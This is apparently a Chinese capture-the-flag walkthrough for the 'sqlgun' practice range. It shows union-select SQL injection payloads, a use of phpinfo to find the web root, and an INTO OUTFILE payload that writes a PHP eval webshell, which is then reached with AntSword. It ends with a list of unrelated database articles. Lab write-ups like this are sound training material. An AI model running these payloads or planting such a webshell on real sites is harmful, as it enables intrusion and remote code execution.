sqlgun靶场通关攻略

尝试在URL中测试一下sql注入,但是禁止注入

那么在输入框中测试一下xss,存在xss,那么极有可能如果存在sql注入在这里

在测试时,出现了这个搜索框的源代码,可以看出是单引号包含,所以可以测试闭合方式为单引号的sql注入

经测试,确实训在sql注入,闭合方式就是单引号

那么接下来测试回显点,得到2,3两个回显点

复制代码
-1' union select 1,2,3#

爆数据库名,得到数据库名sqlgunnews

复制代码
-1' union select 1,database(),3#

既然存在sql注入,那么我们可以尝试一下写入一句话木马进行测试

但是缺少绝对路径

我们对IP进行目录扫描一下看一下有什么可以用的

发现有一个phpinfo.php文件,访问一下

得到网站根目录/var/www/html

那接下来构造payload,将一句话木马写入根目录

复制代码
-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/zxin.php' #

访问zxin.php文件,我们的一句话木马就在进去了

使用蚁剑谅连接一下,成功连接

在根目录中可以找得到falg文件

相关推荐
言德斐2 小时前
SQL性能优化的思路及策略
数据库·sql·性能优化
码界奇点2 小时前
Django视图从基础到高级的全面解析
数据库·django·sqlite·web·python3.11
Allan_20253 小时前
数据库学习
数据库·学习
fen_fen3 小时前
人大金仓数据库kingbase8创建表示例
数据库·oracle
一勺菠萝丶3 小时前
「您的连接不是私密连接」详解:为什么 HTTPS 证书会报错,以及如何正确配置子域名证书
数据库·网络协议·https
²º²²এ松3 小时前
蓝牙低功耗(BLE)通信的中心设备/外围设备(连接角色)、主机/从机(时序角色)、客户端/服务器(数据交互角色)的理解
运维·服务器·数据库
百锦再4 小时前
Vue Scoped样式混淆问题详解与解决方案
java·前端·javascript·数据库·vue.js·学习·.net
数据库知识分享者小北4 小时前
云栖重磅|瑶池数据库:从云原生数据底座向“AI就绪”的多模态数据底座演进
数据库·人工智能·云原生
_Johnny_4 小时前
Redis 升级操作指南:单机与主从模式
数据库·redis·缓存
源力祁老师4 小时前
ODOO数据文件(XML、CSV、SQL)是如何转换并加载到 Odoo 数据库
xml·数据库·sql